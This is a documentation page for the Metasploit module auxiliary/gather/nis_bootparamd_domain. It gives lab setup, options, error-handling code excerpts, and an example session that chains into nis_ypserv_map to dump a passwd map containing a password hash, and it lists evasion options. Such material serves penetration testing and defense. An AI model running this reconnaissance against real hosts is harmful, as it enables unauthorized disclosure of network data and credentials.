NIS bootparamd Domain Name Disclosure - Metasploit


This page contains detailed information about how to use the auxiliary/gather/nis_bootparamd_domain Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: NIS bootparamd Domain Name Disclosure
Module: auxiliary/gather/nis_bootparamd_domain
Source code: modules/auxiliary/gather/nis_bootparamd_domain.rb
Disclosure date: -
Last modification time: 2020-08-14 13:11:38 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 111
List of CVEs: -

This module discloses the NIS domain name from bootparamd. You must know a client address from the target's bootparams file. Hint: try hosts within the same network range as the target.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/gather/nis_bootparamd_domain
msf auxiliary(nis_bootparamd_domain) > show targets
    ... a list of targets ...
msf auxiliary(nis_bootparamd_domain) > set TARGET target-id
msf auxiliary(nis_bootparamd_domain) > show options
    ... show and set options ...
msf auxiliary(nis_bootparamd_domain) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • CLIENT: Client from target's bootparams file

Knowledge Base


Introduction


From the bootparamd(8) man page:

bootparamd is a server process that provides information to diskless clients necessary for booting. It consults the /etc/bootparams file to find the information it needs.

The module documented here lets a tester disclose the NIS domain name from a server running bootparamd. Once the domain name is known, the tester can follow up with auxiliary/gather/nis_ypserv_map to dump a map from a compatible NIS server (running as ypserv).

Setup


Set up NIS as per https://help.ubuntu.com/community/SettingUpNISHowTo. If the link is down, you can find it via the Wayback Machine.

After that is done, install bootparamd however your OS provides it.

Make sure you add a client to the bootparams file, which is usually at /etc/bootparams.

Here is an example bootparams file (courtesy of @bcoles):

clientname root=nfsserver:/export/clientname/root

You can read the bootparams(5) man page for more info.

Lastly, the client should be added to /etc/hosts if it isn't already resolvable.

Options


PROTOCOL

Set this to either TCP or UDP. UDP is the default because bootparamd is normally reached over UDP.

CLIENT

Set this to the address of a client in the target's bootparams file. Usually this is a host within the same network range as the target.

XDRTimeout

Set this to the timeout in seconds for XDR decoding of the response.

Usage


msf > use auxiliary/gather/nis_bootparamd_domain
msf auxiliary(gather/nis_bootparamd_domain) > set rhost 192.168.33.10
rhost => 192.168.33.10
msf auxiliary(gather/nis_bootparamd_domain) > set client 192.168.33.10
client => 192.168.33.10
msf auxiliary(gather/nis_bootparamd_domain) > run

[+] 192.168.33.10:111 - NIS domain name for host ubuntu-xenial (192.168.33.10) is gesellschaft
[*] Auxiliary module execution completed
msf auxiliary(gather/nis_bootparamd_domain) >

After disclosing the domain name, you can use auxiliary/gather/nis_ypserv_map to dump a map from a compatible NIS server.

msf auxiliary(gather/nis_bootparamd_domain) > use auxiliary/gather/nis_ypserv_map
msf auxiliary(gather/nis_ypserv_map) > set rhost 192.168.33.10
rhost => 192.168.33.10
msf auxiliary(gather/nis_ypserv_map) > set domain gesellschaft
domain => gesellschaft
msf auxiliary(gather/nis_ypserv_map) > run

[+] 192.168.33.10:111 - Dumping map passwd.byname on domain gesellschaft:
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
ubuntu:$6$LXFAVGTO$yiCXi1KjLynOrapuhJE7tKnvdwknDMKiKM7Z8ZB19ht6CHmsS.CbUTm8q0cy5fFHEqA.Sg4Acl.0UtY.Y0JNE1:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
games:*:5:60:games:/usr/games:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
uuidd:*:108:112::/run/uuidd:/bin/false
dnsmasq:*:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
root:*:0:0:root:/root:/bin/bash
sshd:*:110:65534::/var/run/sshd:/usr/sbin/nologin
systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
messagebus:*:107:111::/var/run/dbus:/bin/false
_apt:*:105:65534::/nonexistent:/bin/false
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
syslog:*:104:108::/home/syslog:/bin/false
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
pollinate:*:111:1::/var/cache/pollinate:/bin/false
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
lxd:*:106:65534::/var/lib/lxd/:/bin/false

[*] Auxiliary module execution completed
msf auxiliary(gather/nis_ypserv_map) >


Msfconsole Usage


Here is how the gather/nis_bootparamd_domain auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/nis_bootparamd_domain

msf6 auxiliary(gather/nis_bootparamd_domain) > show info

       Name: NIS bootparamd Domain Name Disclosure
     Module: auxiliary/gather/nis_bootparamd_domain
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  SATAN
  pentestmonkey
  wvu <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  CLIENT                     yes       Client from target's bootparams file
  PROTOCOL  udp              yes       Protocol to use (Accepted: tcp, udp)
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     111              yes       The target port (TCP)

Description:
  This module discloses the NIS domain name from bootparamd. You must 
  know a client address from the target's bootparams file. Hint: try 
  hosts within the same network range as the target.

References:
  https://tools.ietf.org/html/rfc1831
  https://tools.ietf.org/html/rfc4506
  http://pentestmonkey.net/blog/nis-domain-name

Module Options


This is a complete list of options available in the gather/nis_bootparamd_domain auxiliary module:

msf6 auxiliary(gather/nis_bootparamd_domain) > show options

Module options (auxiliary/gather/nis_bootparamd_domain):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT                     yes       Client from target's bootparams file
   PROTOCOL  udp              yes       Protocol to use (Accepted: tcp, udp)
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     111              yes       The target port (TCP)

Advanced Options


Here is a complete list of advanced options supported by the gather/nis_bootparamd_domain auxiliary module:

msf6 auxiliary(gather/nis_bootparamd_domain) > show advanced

Module advanced options (auxiliary/gather/nis_bootparamd_domain):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CHOST                            no        The local client address
   CPORT                            no        The local client port
   ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   TIMEOUT         10               yes       Number of seconds to wait for responses to RPC calls
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module
   XDRTimeout      10.0             yes       XDR decoding timeout

Auxiliary Actions


This is a list of all auxiliary actions that the gather/nis_bootparamd_domain module can do:

msf6 auxiliary(gather/nis_bootparamd_domain) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/nis_bootparamd_domain auxiliary module, used to evade defenses (e.g. antivirus, EDR, firewall, NIDS):

msf6 auxiliary(gather/nis_bootparamd_domain) > show evasion

Module evasion options:

   Name                               Current Setting  Required  Description
   ----                               ---------------  --------  -----------
   ONCRPC::tcp_request_fragmentation  false            no        Enable fragmentation of TCP ONC/RPC requests
   TCP::max_send_size                 0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                    0                no        Delays inserted before every send.  (0 = disable)


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Could not connect to portmapper


Here is a relevant code snippet related to the "Could not connect to portmapper" error message:

50:	        proto,  # Protocol: UDP (17)
51:	        100026, # Program: BOOTPARAMS (100026)
52:	        1       # Program Version: 1
53:	      )
54:	    rescue Rex::ConnectionError
55:	      fail_with(Failure::Unreachable, 'Could not connect to portmapper')
56:	    rescue Rex::Proto::SunRPC::RPCError
57:	      fail_with(Failure::Unreachable, 'Could not connect to bootparamd')
58:	    end
59:	
60:	    # Flavor: AUTH_NULL (0)

Could not connect to bootparamd


Here is a relevant code snippet related to the "Could not connect to bootparamd" error message:

52:	        1       # Program Version: 1
53:	      )
54:	    rescue Rex::ConnectionError
55:	      fail_with(Failure::Unreachable, 'Could not connect to portmapper')
56:	    rescue Rex::Proto::SunRPC::RPCError
57:	      fail_with(Failure::Unreachable, 'Could not connect to bootparamd')
58:	    end
59:	
60:	    # Flavor: AUTH_NULL (0)
61:	    sunrpc_authnull
62:	

Could not call bootparamd procedure


Here is a relevant code snippet related to the "Could not call bootparamd procedure" error message:

72:	      res = sunrpc_call(
73:	        1,               # Procedure: WHOAMI (1)
74:	        bootparam_whoami # Boot Parameters
75:	      )
76:	    rescue Rex::Proto::SunRPC::RPCError
77:	      fail_with(Failure::NotFound, 'Could not call bootparamd procedure')
78:	    rescue Rex::Proto::SunRPC::RPCTimeout
79:	      fail_with(Failure::NotVulnerable,
80:	                'Could not disclose NIS domain name (try another CLIENT?)')
81:	    ensure
82:	      # Shut it down! Shut it down forever!

No response from server


Here is a relevant code snippet related to the "No response from server" error message:

82:	      # Shut it down! Shut it down forever!
83:	      sunrpc_destroy
84:	    end
85:	
86:	    unless res
87:	      fail_with(Failure::Unreachable, 'No response from server')
88:	    end
89:	
90:	    bootparams = begin
91:	      Timeout.timeout(datastore['XDRTimeout']) do
92:	        parse_bootparams(res)

Could not parse bootparams


Here is a relevant code snippet related to the "Could not parse bootparams" error message:

95:	      fail_with(Failure::TimeoutExpired,
96:	                'XDR decoding timed out (try increasing XDRTimeout?)')
97:	    end
98:	
99:	    if bootparams.blank?
100:	      fail_with(Failure::Unknown, 'Could not parse bootparams')
101:	    end
102:	
103:	    bootparams.each do |host, domain|
104:	      msg = "NIS domain name for host #{host} (#{client}) is #{domain}"
105:	



Authors


  • SATAN
  • pentestmonkey
  • wvu

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
